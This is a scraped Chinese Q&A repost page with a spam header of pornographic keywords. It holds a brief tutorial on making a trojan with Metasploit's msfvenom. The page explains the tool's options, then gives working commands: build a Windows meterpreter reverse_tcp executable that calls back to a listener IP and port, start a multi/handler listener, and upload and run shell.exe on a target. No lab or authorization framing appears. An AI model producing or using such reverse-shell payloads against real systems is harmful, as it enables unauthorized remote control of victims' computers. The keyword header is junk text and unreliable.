日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Metasploit 之生成木马(msfvenom)

發(fā)布時間:2023/12/2 编程问答 36 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Metasploit 之生成木马(msfvenom) 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

msfvenom參數(shù)
相關參數(shù)介紹

-p, --payload <payload> 指定需要使用的payload(攻擊荷載) -l, --list [module_type] 列出指定模塊的所有可用資源,模塊類型包括: payloads, encoders, nops, all -n, --nopsled <length> 為payload預先指定一個NOP滑動長度 -f, --format <format> 指定輸出格式 (使用 --list formats 來獲取msf支持的輸出格式列表) -e, --encoder [encoder] 指定需要使用的encoder(編碼器) -a, --arch <architecture> 指定payload的目標架構(gòu) --platform <platform> 指定payload的目標平臺 -s, --space <length> 設定有效攻擊荷載的最大長度 -b, --bad-chars <list> 設定規(guī)避字符集,比如: &#039;\x00\xff&#039; -i, --iterations <count> 指定payload的編碼次數(shù) -c, --add-code <path> 指定一個附加的win32 shellcode文件 -x, --template <path> 指定一個自定義的可執(zhí)行文件作為模板 -k, --keep 保護模板程序的動作,注入的payload作為一個新的進程運行 --payload-options 列舉payload的標準選項 -o, --out <path> 保存payload -v, --var-name <name> 指定一個自定義的變量,以確定輸出格式 --shellest 最小化生成payload -h, --help 查看幫助選項 --help-formats 查看msf支持的輸出格式列表

windows
第一步 生成shell.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.129 LPORT=9999 -f exe > shell.exe


第二步 msf進行監(jiān)聽

msf use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.100.129 set lport 9999 run


第三步 上傳到window,運行shell.exe

總結(jié)

以上是生活随笔為你收集整理的Metasploit 之生成木马(msfvenom)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。